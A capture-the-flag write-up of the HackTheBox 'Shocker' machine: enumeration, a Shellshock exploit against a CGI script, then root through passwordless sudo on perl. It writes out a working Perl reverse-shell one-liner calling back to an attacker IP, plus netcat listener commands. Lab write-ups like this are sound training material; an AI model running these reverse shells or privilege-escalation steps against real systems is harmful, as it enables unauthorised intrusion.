HackTheBox — Shocker
What’s going on aspiring hackers, this is shellbreak and we’re going to be doing shocker from HackTheBox, which is a really easy box.
The idea of the box is a web server vulnerable to shellshock which is a very common vulnerability that allows an attacker to execute shell commands from the web server, the reason why this vulnerability occurs is data from web requests is not properly handled in CGI web server technology and so bash incorrectly executes trailing commands when a specially crafted request is sent.
Nmap Scan:
looking at the results, we see 2 ports open:
- port 80 : and its banner is telling us that it’s an Apache web server (version 2.4.18)
- port 2222: and its banner is telling us that it’s an OpenSSH server (version 7.2p2)
and the OS is Ubuntu.
Web Enumeration:
Nothing too interesting here, so we’ll try to enumerate the directories with gobuster:
looking at the result of the enumeration we see one interesting directory, which is cgi-bin, but we don’t have access to this directory since the status code is (403), and due to limited results, I think it’s a good idea to enumerate further and see if the directory cgi-bin has any interesting files,
the reason why I set the -x flag to sh is because I found cgi-bin directory
In computing, Common Gateway Interface is an interface specification for web servers to execute programs that execute like console applications running on a server that generates web pages dynamically. Such programs are known as CGI scripts or simply as CGIs.
so let’s open that file to see if it contains any interesting info,
when we visit the url:
we get a prompt to download the file:
and we don’t see anything interesting here, so at this point I assume that the right path is to exploit shellshock vulnerability to get a shell on the box, so let’s try to exploit it manually using burp suite.
Exploitation:
According to this report:
https://github.com/opsxcq/exploit-CVE-2014-6271
the vulnerability can be triggered by making a specially crafted web request.
read this article if you want to have a solid understanding of how this vulnerability is triggered behind the scenes:
So, the request looks like the following:
now let’s see if that’s going to work:
And indeed it worked, we got an ACE (Arbitrary Command Execution) on the box, now let’s try to get a shell:
and sure don’t forget to set your netcat listener on port 1234
nc -lvnp 1234
now if we hit send, we should be able to get the shell:
and we g0t the shell finally, and here’s the user’s flag:
now let’s head to root part (the easiest ever):
Generally when I first get a shell on a box, I try to see if that user can execute any commands without providing passwords (even before I run any enumeration scripts), using the command:
sudo -l
so as you can see, in the case of this box, user shelly can execute
sudo /usr/bin/perl
with root privileges without providing a password, so it’s gonna be a piece of cake to get root access on the box, I’ll be using a one liner perl script as a command to get a reverse shell:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'but don’t forget to put your machine’s IP address, and to set your netcat listener:
nc -lvnp 1234
on your attacking machine, and on target machine your command should look like:
sudo /usr/bin/perl -e ‘use Socket;$i=”10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
And we got r00t on the box, and here’s the root flag:
So, that was the box, I hope you guys enjoyed it, and I will see you all in the next write up :).
